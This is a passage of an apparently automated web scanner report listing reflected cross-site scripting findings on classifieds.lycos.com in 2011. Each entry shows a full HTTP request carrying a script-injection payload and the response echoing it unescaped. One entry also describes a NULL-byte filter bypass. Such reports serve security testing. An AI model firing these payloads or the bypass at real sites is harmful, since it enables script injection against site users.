Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:53:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:42 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-toy/?1d0d7"><script>alert(1)</script>352dfe6081b=1&mobile=1" rel="nofollow">
...[SNIP]...

1.173. http://classifieds.lycos.com/sale/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca0c4"><script>alert(1)</script>f5884d558bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /saleca0c4"><script>alert(1)</script>f5884d558bf/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:03 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/saleca0c4"><script>alert(1)</script>f5884d558bf/?mobile=1" rel="nofollow">
...[SNIP]...

1.174. http://classifieds.lycos.com/sale/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a221b"><script>alert(1)</script>92058a17db1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale/?a221b"><script>alert(1)</script>92058a17db1=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:58:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:58:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale/?a221b"><script>alert(1)</script>92058a17db1=1&mobile=1" rel="nofollow">
...[SNIP]...

1.175. http://classifieds.lycos.com/service-car/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-car/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c521f"><script>alert(1)</script>dc92c066fef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-carc521f"><script>alert(1)</script>dc92c066fef/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:52:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:52:52 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-carc521f"><script>alert(1)</script>dc92c066fef/?mobile=1" rel="nofollow">
...[SNIP]...

1.176. http://classifieds.lycos.com/service-car/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-car/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8ada"><script>alert(1)</script>12bcdb56ad8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /service-carc8ada"><script>alert(1)</script>12bcdb56ad8/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:20:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:27 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-carc8ada"><script>alert(1)</script>12bcdb56ad8/?mobile=1" rel="nofollow">
...[SNIP]...

1.177. http://classifieds.lycos.com/service-car/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-car/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a67a"><script>alert(1)</script>494540086bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-car/?2a67a"><script>alert(1)</script>494540086bc=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:20:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:05 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-car/?2a67a"><script>alert(1)</script>494540086bc=1&mobile=1" rel="nofollow">
...[SNIP]...

1.178. http://classifieds.lycos.com/service-care/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-care/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24db4"><script>alert(1)</script>f6cca02a61f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-care24db4"><script>alert(1)</script>f6cca02a61f/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:02 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-care24db4"><script>alert(1)</script>f6cca02a61f/?mobile=1" rel="nofollow">
...[SNIP]...

1.179. http://classifieds.lycos.com/service-care/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-care/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c519"><script>alert(1)</script>d96e3b9593b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-care/?4c519"><script>alert(1)</script>d96e3b9593b=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-care/?4c519"><script>alert(1)</script>d96e3b9593b=1&mobile=1" rel="nofollow">
...[SNIP]...

1.180. http://classifieds.lycos.com/service-cleaning/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-cleaning/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78b35"><script>alert(1)</script>632d4fa0958 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-cleaning78b35"><script>alert(1)</script>632d4fa0958/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:16:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:16:31 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-cleaning78b35"><script>alert(1)</script>632d4fa0958/?mobile=1" rel="nofollow">
...[SNIP]...

1.181. http://classifieds.lycos.com/service-cleaning/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-cleaning/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dedc9"><script>alert(1)</script>4c918edfa3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-cleaning/?dedc9"><script>alert(1)</script>4c918edfa3e=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:16:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:16:02 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-cleaning/?dedc9"><script>alert(1)</script>4c918edfa3e=1&mobile=1" rel="nofollow">
...[SNIP]...

1.182. http://classifieds.lycos.com/service-coupon/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-coupon/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b855"><script>alert(1)</script>9221725e733 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-coupon9b855"><script>alert(1)</script>9221725e733/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:20:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:27 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-coupon9b855"><script>alert(1)</script>9221725e733/?mobile=1" rel="nofollow">
...[SNIP]...

1.183. http://classifieds.lycos.com/service-coupon/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-coupon/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d8a6"><script>alert(1)</script>6207b143050 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-coupon/?9d8a6"><script>alert(1)</script>6207b143050=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:20:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:09 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-coupon/?9d8a6"><script>alert(1)</script>6207b143050=1&mobile=1" rel="nofollow">
...[SNIP]...

1.184. http://classifieds.lycos.com/service-creative-design/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-creative-design/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dabc4"><script>alert(1)</script>0ff54031af4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-creative-designdabc4"><script>alert(1)</script>0ff54031af4/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:39 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-creative-designdabc4"><script>alert(1)</script>0ff54031af4/?mobile=1" rel="nofollow">
...[SNIP]...

1.185. http://classifieds.lycos.com/service-creative-design/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-creative-design/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff106"><script>alert(1)</script>ac1990bc01f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-creative-design/?ff106"><script>alert(1)</script>ac1990bc01f=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:53:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:32 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-creative-design/?ff106"><script>alert(1)</script>ac1990bc01f=1&mobile=1" rel="nofollow">
...[SNIP]...

1.186. http://classifieds.lycos.com/service-education-tutor/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-education-tutor/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b57d4"><script>alert(1)</script>a02ae31ac68 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-education-tutorb57d4"><script>alert(1)</script>a02ae31ac68/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:51 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-education-tutorb57d4"><script>alert(1)</script>a02ae31ac68/?mobile=1" rel="nofollow">
...[SNIP]...

1.187. http://classifieds.lycos.com/service-education-tutor/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-education-tutor/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31fb3"><script>alert(1)</script>50ca0473215 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-education-tutor/?31fb3"><script>alert(1)</script>50ca0473215=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:53:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:45 GMT; path=/
